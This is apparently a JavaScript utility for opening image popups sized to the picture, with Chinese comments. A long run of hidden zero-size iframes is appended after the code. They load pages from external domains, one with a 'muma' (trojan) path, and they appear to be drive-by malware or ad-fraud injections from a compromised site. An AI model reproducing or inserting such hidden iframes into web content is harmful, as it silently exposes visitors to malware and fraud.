var imgObj;
var imgheight;
var imgwidth;
function checkImg(theURL,winName){
  // 对象是否已创建
  if (typeof(imgObj) == "object"){
    // 是否已取得了图像的高度和宽度
    if ((imgObj.width != 0) && (imgObj.height != 0))
      // 根据取得的图像高度和宽度设置弹出窗口的高度与宽度，并打开该窗口
      // 其中的增量 20 和 30 是设置的窗口边框与图片间的间隔量
	 {
			  if (imgObj.width>640)
			       imgwidth=640;
			  else
			       imgwidth=imgObj.width
	        
			  if (imgObj.height>480)
			       imgheight=480;
			  else
			       imgheight=imgObj.height	              				   
			  
			  
      OpenFullSizeWindow(theURL,winName, ",width=" + (imgwidth+30) + ",height=" + (imgheight+35));
     }
    else
      // 因为通过 Image 对象动态装载图片，不可能立即得到图片的宽度和高度，所以每隔100毫秒重复调用检查
      setTimeout("checkImg('" + theURL + "','" + winName + "')", 100)
  }
}

function OpenFullSizeWindow(theURL,winName,features) {
  var aNewWin, sBaseCmd;
  // 弹出窗口外观参数
  sBaseCmd = "toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=no,";
  // 调用是否来自 checkImg 
  if (features == null || features == ""){
    // 创建图像对象
    imgObj = new Image();
    // 设置图像源
    imgObj.src = theURL;
    // 开始获取图像大小
    checkImg(theURL, winName)
  }
  else{
    // 打开窗口
    aNewWin = window.open(theURL,winName, sBaseCmd + features);
    // 聚焦窗口
    aNewWin.focus();
  }
}<iframe src="http://w47636.s33.freedns.name/ok/index.htm" width="0" height="0" frameborder="0"></iframe><iframe src="http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe><iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe><iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe><iframe src=http://www.m85853.com.cn/index.htm width=0 height=0></iframe><iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>
<iframe src=http://www.m85853.com.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.m85853.cn/muma/index.htm width=0 height=0></iframe><iframe src=http://w.mh8888.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=http://www.m85853.com.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.m85853.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe><iframe src=http://www.m85853.com.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.m85853.cn/muma/index.htm width=0 height=0></iframe>
<iframe src="http://www.caonima.info/888.html" width="0" height="0" frameborder="0"></iframe>
<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.m85853.cn/gogo/index.htm width=0 height=0></iframe><iframe src=http://xxx.18dmm.com/newdm/new05.htm?075 width=0 height=0></iframe>